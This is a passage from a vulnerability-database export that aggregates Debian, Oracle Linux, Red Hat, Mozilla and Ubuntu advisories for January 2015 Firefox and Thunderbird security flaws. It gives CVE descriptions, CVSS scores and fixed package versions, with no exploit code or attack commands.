CVE-2014-8641\n\nMultiple security issues have been found in Iceweasel, Debian's version \nof the Mozilla Firefox web browser: Multiple memory safety errors\nand implementation errors may lead to the execution of arbitrary code, \ninformation leaks or denial of service.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 31.4.0esr-1~deb7u1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 31.4.0esr-1.\n\nWe recommend that you upgrade your iceweasel packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2015-01-14T19:02:00", "type": "debian", "title": "[SECURITY] [DSA 3127-1] iceweasel security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8638", "CVE-2014-8639", "CVE-2014-8641"], "modified": "2015-01-14T19:02:00", "id": "DEBIAN:DSA-3127-1:695F4", "href": "https://lists.debian.org/debian-security-announce/2015/msg00010.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-21T22:58:54", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3132-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nJanuary 19, 2015 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : icedove\nCVE ID : CVE-2014-8634 CVE-2014-8638 CVE-2014-8639\n\nMultiple security issues have been found in Icedove, Debian's version of\nthe Mozilla Thunderbird mail and news client: Multiple memory safety\nerrors and implementation errors may lead to the execution of arbitrary\ncode, information leaks or denial of service.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 31.4.0-1~deb7u1.\n\nFor the upcoming stable distribution (jessie), these problems will be\nfixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 31.4.0-1.\n\nWe recommend that you upgrade your icedove packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2015-01-19T16:58:23", "type": "debian", "title": "[SECURITY] [DSA 3132-1] icedove security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8638", "CVE-2014-8639"], "modified": "2015-01-19T16:58:23", "id": "DEBIAN:DSA-3132-1:09039", "href": "https://lists.debian.org/debian-security-announce/2015/msg00015.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:37:45", "description": "[31.4.0-1.0.1]\n- Add firefox-oracle-default-prefs.js and firefox-oracle-default-bookmarks.html\n and remove the corresponding Red Hat files\n[31.4.0-1]\n- Update to 31.4.0 ESR\n[31.3.0-9]\n- Fixed problems with dictionaries (mozbz#1097550)\n- Fixed rhbz#1164855 - firefox.desktop is missing\n x-scheme-handler MimeType entries\n[31.3.0-7]\n- Added Python 2.7 to build Firefox\n[31.3.0-6]\n- ia64 fix (mozbz#1093278)", "cvss3": {}, "published": "2015-01-14T00:00:00", "type": "oraclelinux", "title": "firefox security and bug fix update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-8641", "CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8638"], "modified": "2015-01-14T00:00:00", "id": "ELSA-2015-0046", "href": "http://linux.oracle.com/errata/ELSA-2015-0046.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-22T17:02:40", "description": "[31.4.0-1.0.1.el6_6]\n- Replaced thunderbird-redhat-default-prefs.js with thunderbird-oracle-default-prefs.js\n[31.4.0-1]\n- Update to 31.4.0\n[31.3.0-3]\n- Fixed problems with dictionaries (mozbz#1097550)", "cvss3": {}, "published": "2015-01-13T00:00:00", "type": "oraclelinux", "title": "thunderbird security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8638"], "modified": "2015-01-13T00:00:00", "id": "ELSA-2015-0047", "href": "http://linux.oracle.com/errata/ELSA-2015-0047.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2021-10-19T18:42:17", "description": "Mozilla Firefox is an open source web browser. XULRunner provides the XUL\nRuntime environment for Mozilla Firefox.\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nFirefox. (CVE-2014-8634, CVE-2014-8639, CVE-2014-8641)\n\nIt was found that the Beacon interface implementation in Firefox did not\nfollow the Cross-Origin Resource Sharing (CORS) specification. A web page\ncontaining malicious content could allow a remote attacker to conduct a\nCross-Site Request Forgery (XSRF) attack. (CVE-2014-8638)\n\nRed Hat would like to thank the Mozilla project for reporting these issues.\nUpstream acknowledges Christian Holler, Patrick McManus, Muneaki Nishimura,\nXiaofeng Zheng, and Mitchell Harper as the original reporters of these\nissues.\n\nFor technical details regarding these flaws, refer to the Mozilla security\nadvisories for Firefox 31.4.0 ESR. You can find a link to the Mozilla\nadvisories in the References section of this erratum.\n\nThis update also fixes the following bug:\n\n* The default dictionary for Firefox's spell checker is now correctly set\nto the system's locale language. (BZ#643954, BZ#1150572)\n\nAll Firefox users should upgrade to these updated packages, which contain\nFirefox version 31.4.0 ESR, which corrects these issues. After installing\nthe update, Firefox must be restarted for the changes to take effect.\n", "cvss3": {}, "published": "2015-01-13T00:00:00", "type": "redhat", "title": "(RHSA-2015:0046) Critical: firefox security and bug fix update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8638", "CVE-2014-8639", "CVE-2014-8641"], "modified": "2018-06-06T16:24:34", "id": "RHSA-2015:0046", "href": "https://access.redhat.com/errata/RHSA-2015:0046", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-19T18:36:55", "description": "Mozilla Thunderbird is a standalone mail and newsgroup client.\n\nTwo flaws were found in the processing of malformed web content. A web page\ncontaining malicious content could cause Firefox to crash or, potentially,\nexecute arbitrary code with the privileges of the user running Firefox.\n(CVE-2014-8634, CVE-2014-8639)\n\nIt was found that the Beacon interface implementation in Thunderbird did\nnot follow the Cross-Origin Resource Sharing (CORS) specification. A web\npage containing malicious content could allow a remote attacker to conduct\na Cross-Site Request Forgery (XSRF) attack. (CVE-2014-8638)\n\nNote: All of the above issues cannot be exploited by a specially crafted\nHTML mail message as JavaScript is disabled by default for mail messages.\nThey could be exploited another way in Thunderbird, for example, when\nviewing the full remote content of an RSS feed.\n\nRed Hat would like to thank the Mozilla project for reporting these issues.\nUpstream acknowledges Christian Holler, Patrick McManus, Muneaki Nishimura,\nand Xiaofeng Zheng as the original reporters of these issues.\n\nFor technical details regarding these flaws, refer to the Mozilla security\nadvisories for Thunderbird 31.4.0. You can find a link to the Mozilla\nadvisories in the References section of this erratum.\n\nAll Thunderbird users should upgrade to this updated package, which\ncontains Thunderbird version 31.4.0, which corrects these issues.\nAfter installing the update, Thunderbird must be restarted for the changes\nto take effect.\n", "cvss3": {}, "published": "2015-01-13T00:00:00", "type": "redhat", "title": "(RHSA-2015:0047) Important: thunderbird security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8638", "CVE-2014-8639"], "modified": "2018-06-06T16:24:27", "id": "RHSA-2015:0047", "href": "https://access.redhat.com/errata/RHSA-2015:0047", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mozilla": [{"lastseen": "2021-12-29T14:13:19", "description": "Mozilla developers and community identified and fixed several memory safety bugs in the browser engine used in Firefox and other Mozilla-based products. Some of these bugs showed evidence of memory corruption under certain circumstances, and we presume that with enough effort at least some of these could be exploited to run arbitrary code.\n", "edition": 1, "cvss3": {}, "published": "2015-01-13T00:00:00", "type": "mozilla", "title": "Miscellaneous memory safety hazards (rv:35.0 / rv:31.4) \u2014 Mozilla", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8635"], "modified": "2015-01-13T00:00:00", "id": "MFSA2015-01", "href": "https://www.mozilla.org/en-US/security/advisories/mfsa2015-01/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-29T14:13:18", "description": "Google security researcher Michal Zalewski reported that when a malformed bitmap image is rendered by the bitmap decoder within a element, memory may not always be properly initialized. The resulting image then uses this uninitialized memory during rendering, allowing data to potentially leak to web content. \n", "edition": 1, "cvss3": {}, "published": "2015-01-13T00:00:00", "type": "mozilla", "title": "Uninitialized memory use during bitmap rendering \u2014 Mozilla", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8637"], "modified": "2015-01-13T00:00:00", "id": "MFSA2015-02", "href": "https://www.mozilla.org/en-US/security/advisories/mfsa2015-02/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-29T14:13:17", "description": "Brian Smith reported that delegated Online Certificate Status Protocol (OCSP) responder certificates fail to recognize the id-pkix-ocsp-nocheck extension. If this extension is present in a delegated OCSP response signing certificate, it will be discarded if it is signed by such a certificate. This could result in a user connecting to a site with a revoked certificate. \n", "edition": 1, "cvss3": {}, "published": "2015-01-13T00:00:00", "type": "mozilla", "title": "Delegated OCSP responder certificates failure with id-pkix-ocsp-nocheck extension \u2014 Mozilla", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8642"], "modified": "2015-01-13T00:00:00", "id": "MFSA2015-08", "href": "https://www.mozilla.org/en-US/security/advisories/mfsa2015-08/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-29T14:13:17", "description": "Security researcher Holger Fuhrmannek used the used the Address Sanitizer tool to discover a crash in Web Audio while manipulating timelines. This allowed for the a small block of memory with an uninitialized pointer to be read. The crash it not exploitable. \n", "edition": 1, "cvss3": {}, "published": "2015-01-13T00:00:00", "type": "mozilla", "title": "Read of uninitialized memory in Web Audio \u2014 Mozilla", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8640"], "modified": "2015-01-13T00:00:00", "id": "MFSA2015-05", "href": "https://www.mozilla.org/en-US/security/advisories/mfsa2015-05/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-12-29T14:13:17", "description": "Mozilla developer Bobby Holley reported that Document Object Model (DOM) objects with some specific properties can bypass XrayWrappers. This can allow web content to confuse privileged code, potentially enabling privilege escalation. \n", "edition": 1, "cvss3": {}, "published": "2015-01-13T00:00:00", "type": "mozilla", "title": "XrayWrapper bypass through DOM objects \u2014 Mozilla", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8636"], "modified": "2015-01-13T00:00:00", "id": "MFSA2015-09", "href": "https://www.mozilla.org/en-US/security/advisories/mfsa2015-09/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-29T14:13:18", "description": "Security researcher Muneaki Nishimura reported that navigator.sendBeacon() does not follow the cross-origin resource sharing (CORS) specification. This results in the request from sendBeacon() lacking an origin header in violation of the W3C Beacon specification and not being treated as a CORS request. This allows for a potential Cross-site request forgery (XSRF) attack from malicious websites. \n", "edition": 1, "cvss3": {}, "published": "2015-01-13T00:00:00", "type": "mozilla", "title": "sendBeacon requests lack an Origin header \u2014 Mozilla", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8638"], "modified": "2015-01-13T00:00:00", "id": "MFSA2015-03", "href": "https://www.mozilla.org/en-US/security/advisories/mfsa2015-03/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-29T14:13:17", "description": "Security researcher Xiaofeng Zheng of the Blue Lotus Team at Tsinghua University reported reported that a Web Proxy returning a 407 Proxy Authentication response with a Set-Cookie header could inject cookies into the originally requested domain. This could be used for session-fixation attacks. This attack only allows cookies to be written but does not allow them to be read. \n", "edition": 1, "cvss3": {}, "published": "2015-01-13T00:00:00", "type": "mozilla", "title": "Cookie injection through Proxy Authenticate responses \u2014 Mozilla", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8639"], "modified": "2015-01-13T00:00:00", "id": "MFSA2015-04", "href": "https://www.mozilla.org/en-US/security/advisories/mfsa2015-04/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-29T14:13:17", "description": "Security researcher Mitchell Harper discovered a read-after-free in WebRTC due to the way tracks are handled. This results in a either a potentially exploitable crash or incorrect WebRTC behavior. \n", "edition": 1, "cvss3": {}, "published": "2015-01-13T00:00:00", "type": "mozilla", "title": "Read-after-free in WebRTC \u2014 Mozilla", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8641"], "modified": "2015-01-13T00:00:00", "id": "MFSA2015-06", "href": "https://www.mozilla.org/en-US/security/advisories/mfsa2015-06/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2022-08-04T14:18:06", "description": "Mozilla Firefox before 35.0 and SeaMonkey before 2.32 do not properly\ninitialize memory for BMP images, which allows remote attackers to obtain\nsensitive information from process memory via a crafted web page that\ntriggers the rendering of malformed BMP data within a CANVAS element.", "cvss3": {}, "published": "2015-01-14T00:00:00", "type": "ubuntucve", "title": "CVE-2014-8637", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8637"], "modified": "2015-01-14T00:00:00", "id": "UB:CVE-2014-8637", "href": "https://ubuntu.com/security/CVE-2014-8637", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T14:18:06", "description": "Mozilla Firefox before 35.0 and SeaMonkey before 2.32 do not consider the\nid-pkix-ocsp-nocheck extension in deciding whether to trust an OCSP\nresponder, which makes it easier for remote attackers to obtain sensitive\ninformation by sniffing the network during a session in which there was an\nincorrect decision to accept a compromised and revoked certificate.", "cvss3": {}, "published": "2015-01-14T00:00:00", "type": "ubuntucve", "title": "CVE-2014-8642", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8642"], "modified": "2015-01-14T00:00:00", "id": "UB:CVE-2014-8642", "href": "https://ubuntu.com/security/CVE-2014-8642", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T14:18:07", "description": "The mozilla::dom::AudioParamTimeline::AudioNodeInputValue function in the\nWeb Audio API implementation in Mozilla Firefox before 35.0 and SeaMonkey\nbefore 2.32 does not properly restrict timeline operations, which allows\nremote attackers to cause a denial of service (uninitialized-memory read\nand application crash) via crafted API calls.", "cvss3": {}, "published": "2015-01-14T00:00:00", "type": "ubuntucve", "title": "CVE-2014-8640", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8640"], "modified": "2015-01-14T00:00:00", "id": "UB:CVE-2014-8640", "href": "https://ubuntu.com/security/CVE-2014-8640", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T14:18:06", "description": "The XrayWrapper implementation in Mozilla Firefox before 35.0 and SeaMonkey\nbefore 2.32 does not properly interact with a DOM object that has a named\ngetter, which might allow remote attackers to execute arbitrary JavaScript\ncode with chrome privileges via unspecified vectors.", "cvss3": {}, "published": "2015-01-14T00:00:00", "type": "ubuntucve", "title": "CVE-2014-8636", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8636"], "modified": "2015-01-14T00:00:00", "id": "UB:CVE-2014-8636", "href": "https://ubuntu.com/security/CVE-2014-8636", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:18:06", "description": "Multiple unspecified vulnerabilities in the browser engine in Mozilla\nFirefox before 35.0 and SeaMonkey before 2.32 allow remote attackers to\ncause a denial of service (memory corruption and application crash) or\npossibly execute arbitrary code via unknown vectors.", "cvss3": {}, "published": "2015-01-14T00:00:00", "type": "ubuntucve", "title": "CVE-2014-8635", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8635"], "modified": "2015-01-14T00:00:00", "id": "UB:CVE-2014-8635", "href": "https://ubuntu.com/security/CVE-2014-8635", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:18:06", "description": "Multiple unspecified vulnerabilities in the browser engine in Mozilla\nFirefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4,\nand SeaMonkey before 2.32 allow remote attackers to cause a denial of\nservice (memory corruption and application crash) or possibly execute\narbitrary code via unknown vectors.", "cvss3": {}, "published": "2015-01-14T00:00:00", "type": "ubuntucve", "title": "CVE-2014-8634", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634"], "modified": "2015-01-14T00:00:00", "id": "UB:CVE-2014-8634", "href": "https://ubuntu.com/security/CVE-2014-8634", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:18:06", "description": "The navigator.sendBeacon implementation in Mozilla Firefox before 35.0,\nFirefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before\n2.32 omits the CORS Origin header, which allows remote attackers to bypass\nintended CORS access-control checks and conduct cross-site request forgery\n(CSRF) attacks via a crafted web site.", "cvss3": {}, "published": "2015-01-14T00:00:00", "type": "ubuntucve", "title": "CVE-2014-8638", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8638"], "modified": "2015-01-14T00:00:00", "id": "UB:CVE-2014-8638", "href": "https://ubuntu.com/security/CVE-2014-8638", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:18:06", "description": "Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird\nbefore 31.4, and SeaMonkey before 2.32 do not properly interpret Set-Cookie\nheaders within responses that have a 407 (aka Proxy Authentication\nRequired) status code, which allows remote HTTP proxy servers to conduct\nsession fixation attacks by providing a cookie name that corresponds to the\nsession cookie of the origin server.", "cvss3": {}, "published": "2015-01-14T00:00:00", "type": "ubuntucve", "title": "CVE-2014-8639", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8639"], "modified": "2015-01-14T00:00:00", "id": "UB:CVE-2014-8639", "href": "https://ubuntu.com/security/CVE-2014-8639", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:18:05", "description": "Use-after-free vulnerability in the WebRTC implementation in Mozilla\nFirefox before 35.0, Firefox ESR 31.x before 31.4, and SeaMonkey before\n2.32 allows remote attackers to execute arbitrary code via crafted track\ndata.", "cvss3": {}, "published": "2015-01-14T00:00:00", "type": "ubuntucve", "title": "CVE-2014-8641", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": 